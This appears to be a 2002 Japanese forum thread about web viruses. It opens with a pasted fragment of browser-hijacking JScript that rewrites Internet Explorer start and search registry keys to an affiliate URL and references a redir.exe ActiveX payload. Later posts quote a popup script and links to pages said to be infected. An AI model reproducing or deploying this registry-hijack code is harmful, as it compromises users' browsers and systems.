// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");


// Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01");
// Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01");
Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY");
// Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");

Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\search.bisextop.com","http://www.idol-heaven.com/?id=martin");

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchURL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Local Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Bar","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchUrl","http://www.idol-heaven.com/?id=martin");
}

汚染を除去しました。

Shl.regwrite(regkey,filename);
//
//
//

}
catch(e){
return;
}
}

function init(){
setTimeout("f()", 1000);
}
init();


</SCRI-->
<!--ECT CLASSID ="CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC899" CODEBASE="redir.exe" </OBJE-->
</BODY></HTML>

実社会でも、「ボランティア」「奉仕」「手伝い」を他人に強要するヤシには、まともな人はいませぬ。

そゆのはあくまでも「任意・好意・善意もしくは気まぐれ」に基づく行動ですんで。

恐らくウイルス入りと思われるリンク先真っ白なフラッシュ踏んじゃったんだけど、どうすればいいでしょう？

>>974
ウィルスをだしにして他人の力を借りようとせずに、
本当にウィルスがあるのかないのか少なくともソースくらい読んで判断する。

>>974
ウイルスのスキャンをしたらどうっしょ。

ボランティアだから… といって他人に同じ行動(思想)を要求する奴もウザイ。
極端な例が貧民救済募金やってる女子大生。

>>973 「道楽」という行動原理があったりする。

>>977
「道楽」、いいっすね。

ウイルススキャンしても見つからない…
でも後ろのレスで「踏むな」とか２つ位ついてたからウイルスに間違いない…
どっかにIP表示されるくらいだったらいいんだけどなあ…

>>977
青くせーこといってんなよ、な、カス。
こっちまで恥ずかしくなってくるだろ。

39 名前：名無しさん＠３周年 投稿日：02/07/19 20:25 ID:3Lnf+EfE
サッカー監督、世界ベスト100
http://dms100.org/worksucks

さっきこれ踏んだんですが大丈夫でしょうか？
うわさでは強力なウイルスって聞いたんだけど？

>>966
あってるよ。

962は「暇じゃねーんだよ　ヴヲケ」と言ってるのに、
お前（963）は962に対して「書き込みする暇はあるんだな・・・」と言ってるんだろ。

962の発言は１分もあれば書けるが、回答は１行であっても時間はかかることを
965で俺は説明している。つまり、962の言ってること（暇がないこと）に矛盾はない
ことを代弁しているんだが、理解できないような文章だったか？

>>982
オマエ、「いいたいことがよくわからん」ってよくいわれるだろ?
オマエのような馬鹿はROMってるだけのほうがいいぜ。

Norton AntiVirus 2002のウイルス定義は毎日更新しており、XP標準のファイアウォールをオンにしているにも関わらず、
「ファイルへのアクセスが拒否されました」のメッセージが表示され駆除・ファイル復元出来ず、
繰り返し同種のウイルス「VBS.LoveLetter.A」に感染します。
とりあえず、オフラインに切り替えてから検疫した後、XPのシステム復元で対処している現状です。
問題点・対処法として考えられる事をお教え頂けませんでしょうか

>>981
それどんなやつ？

>>985
<script>
function worksucks() {
window.open('1ame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
window.open('lame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
}
</script>
こういう奴。

ウイルスもダウンロードされてくる。

>>986
すみません。
初心者なものでよくわからないのですが
どんなウイルスがはいっているのですか？

デンジャラス

きゅーきゅーしゃ

>>987
どれがウイルス？？
http://ime.nu/dms100.org/worksucks/hello.jpg
↑ｺﾚ?
http://ime.nu/dms100.org/worksucks/gay.jpg
↑ｺﾚ??
http://ime.nu/dms100.org/worksucks/gay.wav
↑ああ、ｺﾚか（w

>>991
なんすか　それ。

>>992
ｸﾘｸして飛んでみ。
At your oun riskで（ｗ

つか、
http空けてｶｷｺしると、ﾋﾟﾛｼｷ規制に引っかかるのか。。。。

>>984
私も全く同じ環境で同じ現象になります。
同じように検疫して削除し続けてます。
今日ニュー速板に行く度に感染します。
ニュー速板がおかしいのか、私のＰＣがおかしいのか…。

>995
どっかにｿｰｽの染み付いて汚れてるんだよ。
着てる服良く見てみ。早く洗わないと落ちなくなるよ。


つか、感染ぢゃ無くて「検出」ﾃﾞｼｮ・・・・

>>996
洗濯の仕方を教えてください…
教えて君ですみませんが…

すっぽんぽんなれや

>>997
そりゃチミ、熱いお湯で洗うがな。
それかｿｰｽの染み付いてるところ良く探し出してｱﾎﾞﾝしてもらうしか無いがな。

・・・そうそう、意外と絵とか模様書いてあるところは見落としがち・・・
「ｱﾎﾞﾝ」は洗剤ね。。。

1000

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。